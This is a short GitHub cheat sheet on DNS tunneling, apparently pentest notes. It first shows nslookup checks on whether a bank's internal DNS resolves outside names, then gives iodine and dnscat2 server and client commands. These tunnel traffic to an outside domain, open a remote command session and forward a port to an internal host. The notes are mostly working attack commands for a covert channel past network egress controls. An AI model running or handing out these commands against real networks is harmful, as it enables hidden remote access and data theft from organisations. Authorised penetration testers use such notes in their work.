forked from areyou1or0/Tunneling
-
Notifications
You must be signed in to change notification settings - Fork 0
/
DNS Tunneling
55 lines (41 loc) · 1.26 KB
/
DNS Tunneling
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
---------------------Detection---------------------
# can we resolve internal domain?
nslookup acmebank.local
Server: 192.168.1.1
Address: 192.168.1.1#53
Name: acmebank.local
Address: 192.168.10.12
# can we resolve an external domain through company DNS server? (if yes, we can perform DNS tunneling)
nslookup google.com
Server: 192.168.1.1
Address: 192.168.1.1#53
Non-authoritative answer:
Address: 216.58.209.14
Name: google.com
# can we communicate with external DNS? (another finding)
nslookup pentest.blog 8.8.8.8
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
Name: pentest.blog
Address: 104.27.169.40
Name: pentest.blog
Address: 104.27.168.40
---------------------Attack---------------------
Tool: iodine
iodine creates 2 tun adaptor and send data between these 2 adapters by tunneling like a DNS query
Server Side:
iodined -f -c -P <pass> <IP address> <domain>
eg:
iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
Client Side:
iodine -f -P <pass> <domain> r
eg:
iodine -f -P P@ssw0rd tunneldomain.com -r
Tool: dnscat2
Server Side:
ruby ./dnscat2.rb tunneldomain.com
Client Side:
./dnscat2 tunneldomain.com
dnscat2> session -i 1
command session (debian) 1> listen 127.0.0.1:8080 10.0.0.20:80